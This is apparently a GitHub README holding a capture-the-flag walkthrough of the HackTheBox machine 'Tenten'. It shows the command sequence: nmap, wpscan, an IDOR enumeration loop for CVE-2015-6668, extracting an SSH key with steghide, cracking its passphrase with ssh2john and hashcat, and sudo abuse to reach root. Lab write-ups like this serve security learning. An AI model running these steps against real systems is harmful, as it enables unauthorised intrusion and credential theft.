Skip to content

Latest commit

 

History

History
120 lines (61 loc) · 2.77 KB

README.md

File metadata and controls

120 lines (61 loc) · 2.77 KB
Raw

Tenten

nmap -p- --min-rate 10000 10.10.10.10 -Pn

alt text

After detection of open ports, let's do greater nmap scan here.

nmap -A -sC -sV -p22,80 10.10.10.10 -Pn

alt text

From nmap scan result, I see that this ip address is resolved into tenten.htb, that's why I need to add this domain name into /etc/hosts file for resolving purposes.

While I look at this web application, I see that it is Wordpress website.

alt text

Let's use wpscan tool to check Wordpress vulnerabilities for this target.

wpscan --url http://tenten.htb/

alt text

There is one plugin that named as job-manager which have IDOR(Insecure Direct Object Reference) vulnerability whose name is CVE-2015-6668.

So I can test this vulnerability via using curl command which we can see Job Applications.

for i in $(seq 1 25); do echo -n "$i: "; curl -s http://tenten.htb/index.php/jobs/apply/$i/ | grep 'entry-title' | cut -d'>' -f2 | cut -d'<' -f1; done

alt text

Let's look at 13 whose name is HackerAccessGranted by using exploit script.

alt text

While browsing this image URL, it shows me such below page.

alt text

Let's download this via wget command.

wget http://tenten.htb/wp-content/uploads/2017/04/HackerAccessGranted.jpg

I guess this image have sensitive info that's why I use steghide to extract some data from this image.

steghide extract -sf HackerAccessGranted.jpg

alt text

It gives me private key id_rsa file, let's decrypt this via ssh2john tool to crack and find passphrase.

ssh2john id_rsa > hash.txt

alt text

Note: Don't forget removing id_rsa string from hash.txt file's beginning.

I crack this hash via hashcat command.

hashcat -m 22931 hash.txt --wordlist /usr/share/wordlists/rockyou.txt

alt text

From wpscan result, I already saw takis username, that's why I check this password for this user via ssh command.

takis: superpassword

Let's change permissions of id_rsa file to 600, then use this to login into machine via ssh.

user.txt

alt text

While running sudo -l to check privileges of this user, I see interesting binary called fuckin.

alt text

I see that this is Bash script via file command.

alt text

While reading content of this script, it says that give me input and I will run this as root user.

alt text

root.txt

alt text